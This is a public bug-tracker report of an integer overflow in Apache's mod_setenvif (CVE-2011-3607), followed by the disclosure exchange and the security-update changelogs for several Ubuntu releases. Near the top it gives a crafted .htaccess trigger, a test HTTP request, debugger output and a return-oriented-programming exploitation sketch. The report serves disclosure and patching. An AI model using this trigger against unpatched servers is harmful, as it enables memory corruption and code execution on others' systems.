Exploitable integer overflow on x86 in mod SetEnvIf, leading to buffer overwrite

Bug #811422 reported by halfdog
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
apache2 (Ubuntu)
Fix Released
Low
Unassigned
Hardy
Fix Released
Low
Marc Deslauriers
Lucid
Fix Released
Low
Marc Deslauriers
Maverick
Fix Released
Low
Marc Deslauriers
Natty
Fix Released
Low
Marc Deslauriers
Oneiric
Fix Released
Low
Marc Deslauriers
Precise
Fix Released
Low
Unassigned

Bug Description

Apache worker on oneric, in server/util.c, function

AP_DECLARE(char *) ap_pregsub(apr_pool_t *p, const char *input,
                              const char *source, size_t nmatch,
                              ap_regmatch_t pmatch[])

contains exploitable integer overflow when calculating length of
buffer:

        else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
            len += pmatch[no].rm_eo - pmatch[no].rm_so;
        }

...

    dest = dst = apr_pcalloc(p, len + 1);

Can be triggered by placing .htaccess file on server with module
enabled:

SetEnvIf MyRequest "^(.*)$"
TestVar=$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$10123456789abcde
SetEnvIf TestVar "^(.*)$"
Test2Var=$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$10123456789abcdef0123456789abcdef0123456789abc
SetEnvIf Test2Var "^(.*)$"
Test3Var=$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1
SetEnvIf Test3Var "^(.*)$"
Test4Var=S$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1

Testrequest:

GET /test/file HTTP/1.1
Host: localhost
MyRequest: 0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
Connection: close

Result: Allocates 2^6 * 2^6 * 2^6 * 2^6 * 2^8 + 1 = 2^32 + 1 bytes via
apr_pcalloc

Add some slack using "0123456789abcde" at end of expression to select if

        else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
            len = pmatch[no].rm_eo - pmatch[no].rm_so;
            memcpy(dst, source + pmatch[no].rm_so, len);
            dst += len;
        }

or while-loop around memcpy should segfault, usually at
        if (no > 9) { /* Ordinary character. */
            if (c == '\\' && (*src == '$' || *src == '&'))
                c = *src++;
            *dst++ = c;
        }

Ubuntu security was informed 20110715, no reply so far. When .htaccess was placed on server, exploitation seems to be possible on nonexec segments using 2 concurrent client requests over net. With return-oriented-programming with 3 blocks from (xchg eax/esp+ret; pop eax+ret, pop ebx,ecx,edx+ret; cd 0x80) should do the trick, but currently stability is not good enough. The main target to control IP is

0 0x002cb36b in apr_brigade_cleanup () from /usr/lib/libaprutil-2.so.0
esi 0x46464646 1179010629
   0x002cb350 <+0>: push %ebp
   0x002cb351 <+1>: push %edi
   0x002cb352 <+2>: push %esi
   0x002cb353 <+3>: sub $0x10,%esp
   0x002cb356 <+6>: mov 0x20(%esp),%edi
   0x002cb35a <+10>: mov 0x4(%edi),%eax
   0x002cb35d <+13>: lea 0x4(%edi),%ebp
   0x002cb360 <+16>: cmp %ebp,%eax
   0x002cb362 <+18>: je 0x2cb393 <apr_brigade_cleanup+67>
   0x002cb364 <+20>: lea 0x0(%esi,%eiz,1),%esi
   0x002cb368 <+24>: mov 0x4(%edi),%esi -- user controlable
=> 0x002cb36b <+27>: mov 0x4(%esi),%eax
   0x002cb36e <+30>: mov (%esi),%edx
   0x002cb370 <+32>: mov %edx,(%eax) -- (esi) to (esi+4)
   0x002cb372 <+34>: mov (%esi),%eax
   0x002cb374 <+36>: mov 0x4(%esi),%edx
   0x002cb377 <+39>: mov %edx,0x4(%eax) -- (esi+4) to ((esi)+4)
   0x002cb37a <+42>: mov 0x8(%esi),%eax
   0x002cb37d <+45>: mov 0x18(%esi),%edx -- 0x18 value to stack
   0x002cb380 <+48>: mov %edx,(%esp)
   0x002cb383 <+51>: call *0xc(%eax)

where esi is user controllable and can be made pointing to other user-data blocks. The symlink attack from
http://www.halfdog.net/Security/2011/ApacheNoFollowSymlinkTimerace/ (issue number coming soon) might be useful to get apache memory layout from /proc/<pid>/maps, a issue to suspend httpd when serving pipes (https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/811417) might be helpful with timing attack, but this not yet proofed.

# lsb_release -rd
Description: Ubuntu oneiric (development branch)
Release: 11.10

# apt-cache policy apache2-mpm-worker
apache2-mpm-worker:
  Installed: 2.2.19-1ubuntu1
  Candidate: 2.2.19-1ubuntu1
  Version table:
 *** 2.2.19-1ubuntu1 0
        500 http://archive.ubuntu.com/ubuntu/ oneiric/main i386 Packages
        100 /var/lib/dpkg/status

Revision history for this message
halfdog (halfdog) wrote :

Read proc/<pid>/maps due to timerace https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/811428 . Since attacker must have been able to place .htaccess on server, he might be able to place a symlink also.

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Thanks for reporting this issue.

Could you please report this issue to the Apache Security Team, and possibly link the resulting bug report here.

Thanks.

Changed in apache2 (Ubuntu):
importance: Undecided → Low
Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

See here for information on reporting this issue:
http://www.apache.org/security/

Revision history for this message
Jamie Strandboge (jdstrand) wrote :

What was the response from upstream?

Changed in apache2 (Ubuntu):
assignee: nobody → Jamie Strandboge (jdstrand)
status: New → Incomplete
Revision history for this message
halfdog (halfdog) wrote :

Sent mail to <email address hidden> 2011-07-15 (no reply) and again today:

Dear Apache Httpd Security Team,

It seems possible to execute arbitrary via the bug reported
2011-07-15. Since this requires a crafted .htaccess file on the host,
this might not be a too big issue.

See

http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/

for first draft of multi-thread exploit (url not published elsewhere).
Currently I'm trying to get more stable code executing using the
stop-regex approach and just a single thread.

I checked the reporting guidelines again today and found, that there is a different security contact mail address mentioned. I'm not sure, if something has changed at apache website or I just picked up an dead address. Resending to <email address hidden>

Revision history for this message
halfdog (halfdog) wrote :

Got reply from apache-security, request to create advisory.

Updated bug information, placed a advisory-stub at http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/ , sent update to apache.

Revision history for this message
halfdog (halfdog) wrote :

Information Joe Orton:

We'd prefer to discuss the appropriate fix for this on the public
mailing list, so could you publish your advisory as soon as is
convenient. We'll follow up with public discussion and patches as
appropriate.

Please use the CVE name CVE-2011-3607 for this issue.

Very good discussion:

http://www.gossamer-threads.com/lists/apache/dev/403775

visibility: private → public
Revision history for this message
halfdog (halfdog) wrote :

CVE-2011-3607 is fixed upstream in trunk, but not yet released: http://svn.apache.org/viewvc?view=revision&revision=1198940

Another CVE-2011-4415 was assigned by mitre to the resource consumption, NULL-dereference issue

Changed in apache2 (Ubuntu Hardy):
status: New → Confirmed
Changed in apache2 (Ubuntu Lucid):
status: New → Confirmed
Changed in apache2 (Ubuntu Maverick):
status: New → Confirmed
Changed in apache2 (Ubuntu Natty):
status: New → Confirmed
Changed in apache2 (Ubuntu Oneiric):
status: New → Confirmed
Changed in apache2 (Ubuntu Precise):
status: Incomplete → Fix Released
assignee: Jamie Strandboge (jdstrand) → nobody
Changed in apache2 (Ubuntu Hardy):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Lucid):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Maverick):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Oneiric):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Natty):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Hardy):
importance: Undecided → Low
Changed in apache2 (Ubuntu Lucid):
importance: Undecided → Low
Changed in apache2 (Ubuntu Maverick):
importance: Undecided → Low
Changed in apache2 (Ubuntu Oneiric):
importance: Undecided → Low
Changed in apache2 (Ubuntu Natty):
importance: Undecided → Low
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apache2 - 2.2.20-1ubuntu1.2

---------------
apache2 (2.2.20-1ubuntu1.2) oneiric-security; urgency=low

  * SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
    directive (LP: #811422)
    - debian/patches/215_CVE-2011-3607.dpatch: validate length in
      server/util.c.
    - CVE-2011-3607
  * SECURITY UPDATE: another mod_proxy reverse proxy exposure
    - debian/patches/216_CVE-2011-4317.dpatch: validate additional URIs in
      modules/mappers/mod_rewrite.c, modules/proxy/mod_proxy.c,
      server/protocol.c.
    - CVE-2011-4317
  * SECURITY UPDATE: denial of service via invalid cookie
    - debian/patches/217_CVE-2012-0021.dpatch: check name and value in
      modules/loggers/mod_log_config.c.
    - CVE-2012-0021
  * SECURITY UPDATE: denial of service and possible code execution via
    type field modification within a scoreboard shared memory segment
    - debian/patches/218_CVE-2012-0031.dpatch: check type field in
      server/scoreboard.c.
    - CVE-2012-0031
  * SECURITY UPDATE: cookie disclosure via Bad Request errors
    - debian/patches/219_CVE-2012-0053.dpatch: check lengths in
      server/protocol.c.
    - CVE-2012-0053
 -- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 09:35:36 -0500

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apache2 - 2.2.17-1ubuntu1.5

---------------
apache2 (2.2.17-1ubuntu1.5) natty-security; urgency=low

  * SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
    directive (LP: #811422)
    - debian/patches/215_CVE-2011-3607.dpatch: validate length in
      server/util.c.
    - CVE-2011-3607
  * SECURITY UPDATE: another mod_proxy reverse proxy exposure
    - debian/patches/216_CVE-2011-4317.dpatch: validate additional URIs in
      modules/mappers/mod_rewrite.c, modules/proxy/mod_proxy.c,
      server/protocol.c.
    - CVE-2011-4317
  * SECURITY UPDATE: denial of service via invalid cookie
    - debian/patches/217_CVE-2012-0021.dpatch: check name and value in
      modules/loggers/mod_log_config.c.
    - CVE-2012-0021
  * SECURITY UPDATE: denial of service and possible code execution via
    type field modification within a scoreboard shared memory segment
    - debian/patches/218_CVE-2012-0031.dpatch: check type field in
      server/scoreboard.c.
    - CVE-2012-0031
  * SECURITY UPDATE: cookie disclosure via Bad Request errors
    - debian/patches/219_CVE-2012-0053.dpatch: check lengths in
      server/protocol.c.
    - CVE-2012-0053
 -- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:02:26 -0500

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apache2 - 2.2.16-1ubuntu3.5

---------------
apache2 (2.2.16-1ubuntu3.5) maverick-security; urgency=low

  * SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
    directive (LP: #811422)
    - debian/patches/215_CVE-2011-3607.dpatch: validate length in
      server/util.c.
    - CVE-2011-3607
  * SECURITY UPDATE: another mod_proxy reverse proxy exposure
    - debian/patches/216_CVE-2011-4317.dpatch: validate additional URIs in
      modules/mappers/mod_rewrite.c, modules/proxy/mod_proxy.c,
      server/protocol.c.
    - CVE-2011-4317
  * SECURITY UPDATE: denial of service and possible code execution via
    type field modification within a scoreboard shared memory segment
    - debian/patches/218_CVE-2012-0031.dpatch: check type field in
      server/scoreboard.c.
    - CVE-2012-0031
  * SECURITY UPDATE: cookie disclosure via Bad Request errors
    - debian/patches/219_CVE-2012-0053.dpatch: check lengths in
      server/protocol.c.
    - CVE-2012-0053
 -- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:11:29 -0500

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apache2 - 2.2.14-5ubuntu8.8

---------------
apache2 (2.2.14-5ubuntu8.8) lucid-security; urgency=low

  * SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
    directive (LP: #811422)
    - debian/patches/215_CVE-2011-3607.dpatch: validate length in
      server/util.c.
    - CVE-2011-3607
  * SECURITY UPDATE: another mod_proxy reverse proxy exposure
    - debian/patches/216_CVE-2011-4317.dpatch: validate additional URIs in
      modules/mappers/mod_rewrite.c, modules/proxy/mod_proxy.c,
      server/protocol.c.
    - CVE-2011-4317
  * SECURITY UPDATE: denial of service and possible code execution via
    type field modification within a scoreboard shared memory segment
    - debian/patches/218_CVE-2012-0031.dpatch: check type field in
      server/scoreboard.c.
    - CVE-2012-0031
  * SECURITY UPDATE: cookie disclosure via Bad Request errors
    - debian/patches/219_CVE-2012-0053.dpatch: check lengths in
      server/protocol.c.
    - CVE-2012-0053
 -- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:36:43 -0500

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apache2 - 2.2.8-1ubuntu0.23

---------------
apache2 (2.2.8-1ubuntu0.23) hardy-security; urgency=low

  * SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
    directive (LP: #811422)
    - debian/patches/220_CVE-2011-3607.dpatch: validate length in
      server/util.c.
    - CVE-2011-3607
  * SECURITY UPDATE: another mod_proxy reverse proxy exposure
    - debian/patches/221_CVE-2011-4317.dpatch: validate additional URIs in
      modules/mappers/mod_rewrite.c, modules/proxy/mod_proxy.c,
      server/protocol.c.
    - CVE-2011-4317
  * SECURITY UPDATE: denial of service and possible code execution via
    type field modification within a scoreboard shared memory segment
    - debian/patches/222_CVE-2012-0031.dpatch: check type field in
      server/scoreboard.c.
    - CVE-2012-0031
  * SECURITY UPDATE: cookie disclosure via Bad Request errors
    - debian/patches/223_CVE-2012-0053.dpatch: check lengths in
      server/protocol.c.
    - CVE-2012-0053
 -- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:49:11 -0500

Changed in apache2 (Ubuntu Hardy):
status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Lucid):
status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Maverick):
status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Natty):
status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Oneiric):
status: Confirmed → Fix Released
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.